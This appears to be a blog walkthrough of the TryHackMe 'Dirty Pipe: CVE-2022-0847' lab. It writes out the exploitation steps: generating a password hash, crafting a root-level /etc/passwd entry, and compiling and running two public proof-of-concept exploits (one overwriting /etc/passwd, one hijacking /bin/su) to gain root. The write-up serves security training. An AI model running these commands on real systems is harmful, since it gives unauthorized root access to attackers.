Tryhackme - Dirty Pipe: CVE-2022-0847

Tryhackme – Dirty Pipe: CVE-2022-0847

In this walk through, we will be going through the Dirty Pipe: CVE-2022-0847 room from Tryhackme. In this room, we will have an overview of the vulnerability, as well as will get an opportunity to exploit it ourselves in the vulnerable machine attached to this task. We will start by taking a look at the vulnerability and exploit at a high-level, before moving on to exploiting the vulnerability in subsequent sections of the room. So, let’s get started without any delay.

Dirty Pipe: CVE-2022-0847

Task 1 – [Info] Introduction and Deploy

Task 1 - [Info] Introduction and Deploy

Task 2 – [Tutorial] Vulnerability Background

Question 1 – Read the information in the task and understand how Dirty Pipe works.

Task 2 - [Tutorial] Vulnerability Background

Task 3 – [Practical] A Weaponised PoC

Question 1 – Follow along with the steps described in the task if you haven’t already done so.

  • Generate a password of your choice using openssl.

openssl passwd -6 --salt THM "PASSWORD"

generating password

  • Put it in the format like below that is required by the /etc/passwd file.

'muiri:$6$THM$MeGI7eYSh.ex3l79m8sMQ2dq9Ux77JfC7XlCgZbneUFAvnHj4gphJKnnveuf2AndcoLn2mmhJVhcxvAIgA8RJ.:0:0::/root:/bin/bash   '

  • Upon checking the password length of “games” user. It stood out as the best candidate to overwrite as required by the exploit.

grep -b "games" /etc/passwd
cd ~/Exploit/PoC/
gcc poc.c -o exploit

compiling exploit

  • Execute the exploit and switch user to get root.

 ./exploit /etc/passwd 189 'muiri:$6$THM$MeGI7eYSh.ex3l79m8sMQ2dq9Ux77JfC7XlCgZbneUFAvnHj4gphJKnnveuf2AndcoLn2mmhJVhcxvAIgA8RJ.:0:0::/root:/bin/bash
> '

su muiri

getting root

Question 2 – What is the flag found in the /root/flag.txt file?

root flag

Question 3 – Using your root shell, restore the original /etc/passwd file from your backup.

Task 3 - [Practical] A Weaponised PoC

Task 4 – [Practical] A Second Exploit

Question 1 – Exploit the target using bl4sty’s exploit for Dirty Pipe

cd /home/tryhackme/Exploit/Bl4sty
gcc dirtypipez.c -o exploit
./exploit /bin/su

Second exploit

Question 2 – Remove the SUID binary created by the script (/tmp/sh).

Question 3 – [Optional] Find another exploit for this vulnerability online. Review the code to ensure that it does what it claims to do, then upload it to the target and attempt to exploit the vulnerability a third way.

Task 4 - [Practical] A Second Exploit

Task 5 – [Info] Conclusion

Task 5 - [Info] Conclusion

Also Read: Tryhackme – RustScan

So that was “Dirty Pipe: CVE-2022-0847” for you. We first had an overview of the vulnerability and then took a deep dive on how the exploit works. Further, we gets a hands on experience in the attached VM and got root. At last, looked into an alternate exploit and completed the room. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top